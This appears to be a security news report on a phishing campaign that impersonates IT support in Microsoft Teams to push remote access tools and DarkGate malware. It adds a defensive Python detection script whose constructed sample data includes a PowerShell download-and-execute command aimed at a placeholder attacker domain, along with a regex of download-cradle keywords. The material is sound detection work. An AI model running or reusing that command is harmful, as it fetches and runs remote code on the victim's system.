Husain Parvez
Published on: September 4, 2025
Security researchers have uncovered a phishing campaign exploiting Microsoft Teams to distribute malware by impersonating IT support staff. The attacks, detailed by Permiso and reported by Infosecurity Magazine and SC Media, show how criminals are embedding themselves inside trusted workplace tools rather than relying solely on email.
The campaigns use Teams accounts with display names such as “IT SUPPORT” or “Help Desk,” sometimes decorated with checkmark emojis to mimic a verified badge. Employees are persuaded to install or launch remote access tools such as AnyDesk and the Windows-bundled Quick Assist, giving attackers direct, interactive control of corporate systems. Once inside, the threat actors deploy credential-stealing malware, including DarkGate, alongside the Matanbuchus loader, and set up persistence for long-term access.
Microsoft noted the tactic has been on the rise since mid-2024, when its threat intelligence team observed criminals abusing Teams as a new entry point. Permiso said the current wave of attacks has been tied to a financially motivated operation known as EncryptHub, also tracked as Water Gamayun and LARVA-208. According to Permiso, “The reuse of static cryptographic constants across campaigns is a notable operational weakness, one that enables defenders to pivot in malware repositories and track this group’s tooling over time.”
The malware payloads are delivered through short scripts that run once remote access has been granted. Researchers observed PowerShell commands that download additional components, perform credential theft, and establish encrypted communications with attacker-controlled domains. In some cases, the attackers used an AnyDesk session to take control of a machine before deploying DarkGate without the user's knowledge; DarkGate has been linked to large-scale phishing and ransomware operations.
Morphisec confirmed seeing these tactics in July 2025, when attackers contacted employees through Teams calls pretending to be the IT helpdesk. “In one of the most recent cases, a Morphisec customer was targeted through external Microsoft Teams calls impersonating an IT helpdesk,” the company said.
By operating inside Teams, attackers sidestep email-based defenses and embed their operations directly in corporate workflows. Security experts recommend monitoring for unusual Teams activity, in particular chats and calls initiated from external tenants by accounts posing as the help desk; restricting the use of remote access tools that IT has not sanctioned, including first-party ones such as Quick Assist; and training employees to verify IT requests through a separate, known channel before responding.
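The following is an added detection example, not code from the original article or from any of the vendors it cites. It ties together the two technical points above: the external Teams contact from a help-desk-styled sender, and the remote access tool launch and PowerShell download cradle that follow it. The event records, their field names, the help-desk name patterns, the tool list and the cradle regex are all assumptions constructed for the example; the records are not real Microsoft 365 audit-log or EDR output, so map your own sources' fields onto them.

```python
"""Correlate help-desk impersonation over Teams with what the victim's host does next."""
import re
from datetime import datetime, timedelta, timezone

# Constructed sample records in an assumed, simplified schema (not a real audit-log format).
TEAMS_EVENTS = [
    {"ts": "2025-07-14T09:02:11Z", "user": "alice@corp.example",
     "sender_display": "IT SUPPORT \u2705", "external": True, "type": "ChatCreated"},
    {"ts": "2025-07-14T10:15:00Z", "user": "bob@corp.example",
     "sender_display": "Help Desk", "external": False, "type": "MessageSent"},
    {"ts": "2025-07-14T11:40:30Z", "user": "carol@corp.example",
     "sender_display": "Dana Lee", "external": True, "type": "CallStarted"},
]

# Constructed process-creation records (assumed schema); the URL uses the reserved .invalid TLD.
PROCESS_EVENTS = [
    {"ts": "2025-07-14T09:11:05Z", "user": "alice@corp.example", "image": "AnyDesk.exe",
     "cmdline": r"C:\Users\alice\Downloads\AnyDesk.exe"},
    {"ts": "2025-07-14T09:18:40Z", "user": "alice@corp.example", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://c2.example.invalid/s1.ps1')\""},
    {"ts": "2025-07-14T10:20:00Z", "user": "bob@corp.example", "image": "QuickAssist.exe",
     "cmdline": r"C:\Windows\System32\QuickAssist.exe"},
    {"ts": "2025-07-14T13:00:00Z", "user": "carol@corp.example", "image": "AnyDesk.exe",
     "cmdline": r"C:\Users\carol\Downloads\AnyDesk.exe"},
]

# Display-name patterns borrowed from the campaign; extend with your organisation's own help-desk names.
HELPDESK_NAME_RE = re.compile(
    r"\b(it\s*support|help\s*desk|service\s*desk|it\s*help\s*desk)\b", re.IGNORECASE)
TRUST_BADGES = ("\u2705", "\u2714", "\u2611")  # checkmark emojis used to fake a verified badge
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "quickassist.exe"}  # assumed allow/deny list, case-insensitive
DOWNLOAD_CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|-enc(odedcommand)?\b",
    re.IGNORECASE)


def parse_ts(value):
    """Parse the ISO-8601 UTC timestamps used in the sample records."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def is_helpdesk_impersonation(event):
    """True for an external-tenant sender whose display name borrows the help-desk persona or a fake badge."""
    if not event["external"]:
        return False  # internal help-desk accounts are expected to use these names
    name = event["sender_display"]
    return bool(HELPDESK_NAME_RE.search(name)) or any(badge in name for badge in TRUST_BADGES)


def correlate(teams_events, process_events, window=timedelta(minutes=30)):
    """Flag suspicious external contacts that are followed, on the same user's host, by a
    remote access tool launch or a PowerShell download cradle within `window`."""
    alerts = []
    for tev in teams_events:
        if not is_helpdesk_impersonation(tev):
            continue
        start = parse_ts(tev["ts"])
        end = start + window
        follow = [p for p in process_events
                  if p["user"] == tev["user"] and start <= parse_ts(p["ts"]) <= end]
        tools = sorted({p["image"].lower() for p in follow
                        if p["image"].lower() in REMOTE_ACCESS_TOOLS})
        cradles = [p["cmdline"] for p in follow
                   if p["image"].lower() == "powershell.exe" and DOWNLOAD_CRADLE_RE.search(p["cmdline"])]
        if tools or cradles:
            alerts.append({
                "user": tev["user"],
                "sender": tev["sender_display"],
                "contact_at": tev["ts"],
                "remote_tools": tools,
                "download_cradles": cradles,
                # both stages together is the full chain the article describes
                "severity": "high" if tools and cradles else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(TEAMS_EVENTS, PROCESS_EVENTS):
        print(alert)
```

On the constructed data only the first contact fires: the external “IT SUPPORT ✅” chat is followed within half an hour by an AnyDesk launch and a hidden-window PowerShell download cradle on the same user's host, so it is rated high. The internal “Help Desk” message and the external but unremarkable call from a named partner contact produce nothing, which is the point of keying on the external flag and the persona rather than on the tool launch alone, since Quick Assist use by a real help desk is routine.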